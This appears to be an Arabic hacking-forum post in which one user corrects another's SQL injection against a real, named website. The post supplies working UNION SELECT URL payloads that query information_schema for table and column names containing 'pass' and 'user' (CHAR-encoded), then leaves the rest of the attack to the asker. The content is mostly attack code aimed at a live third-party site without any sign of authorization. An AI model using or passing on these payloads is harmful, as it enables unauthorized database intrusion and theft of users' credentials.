[مشكلة] مساعدة بخصوص حقن موقع

[googles]

ممم المشكل سهل جدا لديك خطأ في الامر :
هذا هو الامر الذي وضعت :

كود PHP:

www.pouet.net/bbses.php?which=-713 union select 1,2,3,4,5,6,concat(table_name,0x3a,column_name,0x3 a,table_schema),8,9+from+information_schema.column s+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)-- 


أنظر هذا هو الامر الصحيح :

كود PHP:

http://www.pouet.net/bbses.php?which=-713+union+select+1,2,3,4,5,6,group_concat(table_name,0x3a,column_name,0x3a,table_schema),8,9+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)-- 


اضغط هنا لرؤية الصورة
كما ترى لم يجد أي جدول أو أي عمود يحتوي على كلمة pass المشفرة بــ char

ولاكن يمكنك تشفير %user% بـ char لترى هل هناك نتيجة أم لا
طيب أنا قمت بتشفير %user%
هذا هو الامر :

كود PHP:

http://www.pouet.net/bbses.php?which=-713+union+select+1,2,3,4,5,6,group_concat(table_name,0x3a,column_name,0x3a,table_schema),8,9+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 117, 115, 101, 114, 37)-- 


وهذه صورة توضيحية لنتيجة
اظغط هنا لرؤية الصورة

أترك لك البقية
تحياتي .